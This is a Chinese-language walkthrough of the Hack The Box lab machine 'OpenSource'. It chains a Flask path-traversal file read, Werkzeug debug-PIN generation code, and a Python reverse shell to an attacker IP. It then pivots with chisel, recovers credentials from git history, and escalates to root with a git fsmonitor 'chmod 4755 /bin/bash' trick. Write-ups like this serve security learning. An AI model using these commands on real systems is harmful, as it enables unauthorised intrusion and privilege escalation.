OpenSource
靶机地址:https://app.hackthebox.com/machines/471
信息收集
┌──(root㉿kali)-[~/Desktop]
└─# nmap -Pn -sC -sV -p- 10.129.212.208 --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 16:01 CST
Nmap scan report for 10.129.212.208
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
| 256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_ 256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp open http Werkzeug/2.1.2 Python/3.10.3
|_http-title: upcloud - Upload files for Free!
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.1.2 Python/3.10.3
| Date: Mon, 08 Apr 2024 08:01:15 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 5316
| Connection: close
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>upcloud - Upload files for Free!</title>
| <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script>
| <script src="/static/vendor/popper/popper.min.js"></script>
| <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script>
| <script src="/static/js/ie10-viewport-bug-workaround.js"></script>
| <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/>
| <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/>
| <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/>
| <link rel=
| HTTPOptions:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.1.2 Python/3.10.3
| Date: Mon, 08 Apr 2024 08:01:15 GMT
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, HEAD, GET
| Content-Length: 0
| Connection: close
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
3000/tcp filtered ppp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=4/8%Time=6613A46B%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1573,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.1\.2\x2
SF:0Python/3\.10\.3\r\nDate:\x20Mon,\x2008\x20Apr\x202024\x2008:01:15\x20G
SF:MT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x
SF:205316\r\nConnection:\x20close\r\n\r\n<html\x20lang=\"en\">\n<head>\n\x
SF:20\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20<meta\x20nam
SF:e=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\"
SF:>\n\x20\x20\x20\x20<title>upcloud\x20-\x20Upload\x20files\x20for\x20Fre
SF:e!</title>\n\n\x20\x20\x20\x20<script\x20src=\"/static/vendor/jquery/jq
SF:uery-3\.4\.1\.min\.js\"></script>\n\x20\x20\x20\x20<script\x20src=\"/st
SF:atic/vendor/popper/popper\.min\.js\"></script>\n\n\x20\x20\x20\x20<scri
SF:pt\x20src=\"/static/vendor/bootstrap/js/bootstrap\.min\.js\"></script>\
SF:n\x20\x20\x20\x20<script\x20src=\"/static/js/ie10-viewport-bug-workarou
SF:nd\.js\"></script>\n\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20hr
SF:ef=\"/static/vendor/bootstrap/css/bootstrap\.css\"/>\n\x20\x20\x20\x20<
SF:link\x20rel=\"stylesheet\"\x20href=\"\x20/static/vendor/bootstrap/css/b
SF:ootstrap-grid\.css\"/>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"\x20/static/vendor/bootstrap/css/bootstrap-reboot\.css\"/>\n\n\x
SF:20\x20\x20\x20<link\x20rel=")%r(HTTPOptions,C7,"HTTP/1\.1\x20200\x20OK\
SF:r\nServer:\x20Werkzeug/2\.1\.2\x20Python/3\.10\.3\r\nDate:\x20Mon,\x200
SF:8\x20Apr\x202024\x2008:01:15\x20GMT\r\nContent-Type:\x20text/html;\x20c
SF:harset=utf-8\r\nAllow:\x20OPTIONS,\x20HEAD,\x20GET\r\nContent-Length:\x
SF:200\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20r
SF:equest\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x
SF:20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x
SF:20\x20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.86 seconds
开放22、80、3000端口。
先访问80web端口
dirsearch扫描着
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch -u http://10.129.212.208
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/reports/http_10.129.212.208/_24-04-08_16-06-33.txt
Target: http://10.129.212.208/
[16:06:33] Starting:
[16:07:56] 200 - 2KB - /console
[16:08:08] 200 - 2MB - /download
[16:09:36] 500 - 16KB - /uploads/affwp-debug.log
[16:09:36] 500 - 15KB - /uploads/dump.sql
获取shell
访问/console
有一个PIN锁。
看样能生成PIN。同时也知道了这是python的flask框架。
https://blog.csdn.net/qq_35782055/article/details/129126825
通过文章得知
通过PIN码可以进入flask的debug模式,从而执行代码,进而getshell
pin码生成要六要素
1.username 在可以任意文件读的条件下读 /etc/passwd进行猜测。
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id 机器码 这个待会细说,一般就生成pin码不对就是这错了
看样子要找到任意文件读取的漏洞。那么在哪呢?继续收集信息。
在web页面中点击download能下载源码。解压看看
先脱下来,一会再说。点击Take me there!,会跳转到一个上传功能页面。
经测试,这个是可以上传东西并下载的。
继续查看源码
@app.route('/', methods=['GET', 'POST']) 定义路由,使用GET和POST方法访问网站根目录会执行下方的upload_file()函数。
@app.route('/uploads/<path:path>')一样,访问网站uploads目录下的文件,会执行send_report(path)函数。但这有个小细节。也就是传入get_file_name(path)函数的只包括uploads后的那一部分。比如访问/uploads/..//../../../etc/passwd,get_file_name(path)函数只会处理..//../../../etc/passwd。
原理可以搜索flask的自定义路由转换器,我是看的这个视频https://www.bilibili.com/video/BV1pa4y117iE/?p=7
跟踪get_file_name(path)函数函数,发现他只是将../替换为空
那么,如果传入uploads/..//etc/passwd,那么send_files()函数处理的便是etc/passwd。(这是flask框架自带的函数,用于发送文件的)
也就是说,这里存在任意文件读取。抓包试试。
读取成功。
回到PIN锁需要的信息,已经知道
pin码生成要六要素
1.username root #在source\config\supervisord.conf中找到
2.modname 默认flask.app
3.appname 默认Flask
4.moddir /usr/local/lib/python3.10/site-packages/flask/app.py #flask库下app.py的绝对路径,可以通过报错拿到。
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id /proc/sys/kernel/random/boot_id和/proc/self/cgroup拼接
/sys/class/net/eth0/address
再将其转为十进制,为2485377892358
https://www.vultr.com/zh/resources/mac-converter/
/proc/sys/kernel/random/boot_id,b01e2717-bfd4-4595-a6fe-c94cdcde88d5
/proc/self/cgroup,7c4ad9fe23a4742c8f510fbdbf77e5e5118469c3ac89280b62c797de1422d198
那么拼接到脚本中
import hashlib
from itertools import chain
probably_public_bits = [
'root',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.10/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485377892358', # 访问 /sys/class/net/eth0/address
'b01e2717-bfd4-4595-a6fe-c94cdcde88d57c4ad9fe23a4742c8f510fbdbf77e5e5118469c3ac89280b62c797de1422d198' # /proc/sys/kernel/random/boot_id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x : x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num
print(rv)
进入控制台。
网上搜索python的反弹shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
同时本地开启监听。
其实上文的/proc/self/cgroup·也提示了这是docker环境
重新反弹shell,同时也重新监听。
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
逃逸docker
在docker环境中自然是找不到flag的,但是发现有个主机一直在访问此docker环境。使用chisel挂上代理扫一扫。
本地开启http服务。
python3 -m http.server 8888
反弹shell中下载
wget http://10.10.16.4:8888/chisel
本地
./chisel server --reverse --port 1234
靶机上
./chisel client 10.10.16.4:1234 R:socks
本地添加上代理
vim /etc/proxychains4.conf
挂上proxychains开始扫描。直接使用-p-参数扫描会很慢。所以最好是指定端口。
proxychains nmap -sT -Pn -p- 172.17.0.1 --min-rate=5000
proxychains nmap -sT -Pn -p22,80,443,3000 172.17.0.1
172.17.0.1开放了3000端口。
在浏览器配置上代理访问下3000端口试试
找到一个gitea仓库。
在 Explore 发现一个 dev01 用户
在下载的源码中使用git命令
┌──(root㉿kali)-[~/Downloads/source]
└─# git branch
dev
* public
┌──(root㉿kali)-[~/Downloads/source]
└─# git checkout dev
切换到分支 'dev'
┌──(root㉿kali)-[~/Downloads/source]
└─# git log
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date: Thu Apr 28 13:47:24 2022 +0200
ease testing
commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date: Thu Apr 28 13:46:54 2022 +0200
added gitignore
commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date: Thu Apr 28 13:46:16 2022 +0200
updated
commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date: Thu Apr 28 13:45:17 2022 +0200
initial
┌──(root㉿kali)-[~/Downloads/source]
└─# git diff a76f8f75f7a4a12b706b0cf9c983796fa1985820 ee9d9f1ef9156c787d53074493e39ae364cd1e05
diff --git a/app/.vscode/settings.json b/app/.vscode/settings.json
deleted file mode 100644
index 5975e3f..0000000
--- a/app/.vscode/settings.json
+++ /dev/null
@@ -1,5 +0,0 @@
-{
- "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
- "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
- "http.proxyStrictSSL": false
-}
diff --git a/app/app/views.py b/app/app/views.py
index 0f3cc37..f2744c6 100644
--- a/app/app/views.py
+++ b/app/app/views.py
@@ -6,17 +6,7 @@ from flask import render_template, request, send_file
from app import app
-@app.route('/')
-def index():
- return render_template('index.html')
-
-
-@app.route('/download')
-def download():
- return send_file(os.path.join(os.getcwd(), "app", "static", "source.zip"))
-
-
-@app.route('/upcloud', methods=['GET', 'POST'])
+@app.route('/', methods=['GET', 'POST'])
def upload_file():
:
找到了账号密码dev01:Soulless_Developer#2022
使用此账户密码登录gitea系统
在仓库中找到了ssh私钥。
于是乎可以下载下来连接主机了。
chmod 600 id_rsa #ssh私钥文件权限只能是600,权限不对会连接不上
ssh -i id_rsa dev01@10.129.212.157
提权
htb的靶场似乎不能用linux内核漏洞提权。老老实实跟着wp走吧。
没有密码,执行sudo -l不成功,用刚刚找到的密码也不对。
上pspy监听进程吧。
wget htpp://10.10.16.4:8888/pspy64
chmod +x pspy64
./pspy64
执行的命令是 /usr/lib/git-core/git-remote-http,这是一个Git命令行工具,用于管理Git远程仓库的HTTP访问。在这个例子中,它被用来设置或查询名为 origin 的远程仓库的URL。UID=0,为root权限。
修改git的配置文件,让其以root权限执行命令。
在./git/config文件中添加fsmonitor = "chmod 4755 /bin/bash"
这个命令的作用是给予/bin/bash SUID(Set User ID upon execution)权限。
SUID权限允许任何用户以文件所有者(在这个例子中是root)的身份执行文件。因此,当chmod 4755 /bin/bash命令执行后,任何用户都可以运行bash -p来启动一个具有root权限的shell。
写在最后
本人有点菜,这个靶场用时有点久。写wp时重启了下环境,所以目的IP变了。
有些地方还没解释清楚。会回来重新补充的。
